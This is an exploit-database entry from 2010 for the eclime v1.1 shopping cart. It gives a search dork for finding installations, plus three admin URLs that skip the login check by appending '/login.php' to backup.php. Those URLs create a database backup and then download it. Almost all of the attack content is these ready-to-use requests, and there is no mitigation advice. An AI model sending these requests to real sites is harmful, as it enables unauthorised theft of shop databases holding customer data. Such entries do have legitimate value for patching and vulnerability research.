eclime v1.1 ByPass / Create and Download Backup Vulnerability

2010-04-18T00:00:00
ID 1337DAY-ID-11860
Type zdt
Reporter indoushka
Modified 2010-04-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================================
eclime v1.1 ByPass / Create and Download Backup Vulnerability
=============================================================

========================================================================================                 
| # Title    : eclime v1.1 => by Pass / Creat and Download Backup Vulnerability  
| # Author   : indoushka                                                              
| # email    : [email protected]                                                  
| # Home     : www.iqs3cur1ty.com/vb                                                                    
| # Dork     : Powered by eclime.com                                                                                                           
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0)      
| # Bug      : Backup                                                                    
======================      Exploit By indoushka       =================================
# Exploit  :
------------------------------------------
eclime v1.1 (March 2010)
------------------------------------------
eclime is a free opensource smarty based shopping cart
build on osCommerce 2.2 solid engine, with many useful
contributions added.
 
------------------------------------------
 
http://127.0.0.1/eclime/admin/backup.php/login.php?action=backup
 
http://127.0.0.1/eclime/admin/backup.php/login.php?action=backupnow
 
to download buckup : http://127.0.0.1/eclime/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql
 
db_comm-20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with opera 10.10 + Mozilla Firefox



#  0day.today [2018-01-10]  #